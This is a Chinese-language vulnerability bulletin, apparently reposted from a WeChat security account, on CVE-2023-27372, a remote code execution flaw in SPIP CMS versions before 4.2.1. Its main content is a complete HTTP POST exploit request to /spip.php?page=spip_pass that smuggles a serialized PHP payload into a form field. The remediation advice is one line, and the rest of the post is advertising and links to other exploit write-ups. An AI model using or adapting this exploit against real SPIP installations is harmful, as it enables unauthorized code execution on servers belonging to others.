漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

admin 2023年7月12日02:57:53评论168 views字数 1664阅读5分32秒阅读模式

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

0x01 前言

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞

0x02 漏洞等级


0x03 影响版本

SPIP  < 4.2.1

0x04 漏洞复现

访问payload页面是这个酱紫

/spip.php?page=spip_pass

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

EXP:

POST /spip.php?page=spip_pass HTTP/1.1Host: 1.1.1.1Content-Length: 185Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cibcInit=ouiConnection: close
page=spip_pass&formulaire_action=oubli&formulaire_action_args=E1nK0hfOPllDtCUbG6L94SlEpZi7Vz17IKUbf0ZB6ET0WbEHeXrw9tNNCEWjm0ac0%2F4DuboKIZvygjRh&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

0x05 修复方案

建议及时更新至最新版本。

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

网 安 考 证漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

高薪内推 | 2023国HVV来了!大量招人中···

内推通道👇 

http://gywa.com.cn/hsqXti

报名投递简历时记得备注【渗透Xiao白帽】可优先直推面试~

也可阅读原文报名或扫描下方二维码进群咨询~

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

23hvv红蓝py交流群,共享资源 一起py漏洞速递|CVE-2023-27372 RCE漏洞(附EXP) 

不定期福利赠送

群满可以后台加vx备注py 邀请进群漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)


【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

往期文章有彩蛋哦漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

原文始发于微信公众号(渗透Xiao白帽):漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月12日02:57:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞速递|CVE-2023-27372 RCE漏洞(附EXP)http://cn-sec.com/archives/1867459.html

发表评论

匿名网友 填写信息